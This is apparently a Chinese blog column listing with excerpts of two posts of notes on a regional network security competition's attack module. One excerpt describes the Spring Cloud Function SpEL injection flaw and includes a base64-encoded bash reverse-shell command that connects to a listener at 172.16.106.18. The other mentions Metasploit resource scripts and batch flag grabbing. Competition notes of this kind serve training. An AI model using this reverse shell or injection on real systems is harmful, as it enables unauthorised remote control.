C模块
文章平均质量分 55
何辰风
凌云志,誓做世间第一流
展开
-
2023年广东省网络安全C模块(笔记详解)
当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTA2LjE4LzEyMTIgMD4mMQ==}|{base64,-d}|{bash,-i}修改数据包发包监听。Php反序列化,查看页面。原创 2024-01-01 05:01:18 · 790 阅读 · 0 评论 -
网络安全C模块命令
后台持续监听(恶心别人,一些环境中,只要你监听不结束,别人是无法进入获取flag)还是那句话,你在打命令的时候,别人已经用脚本拿一血了。扫描存活主机(便捷,速度还行,缺点无法进行系统区分)msfconsole -r 文件名。批量获取会话flag。原创 2023-12-21 01:27:46 · 510 阅读 · 0 评论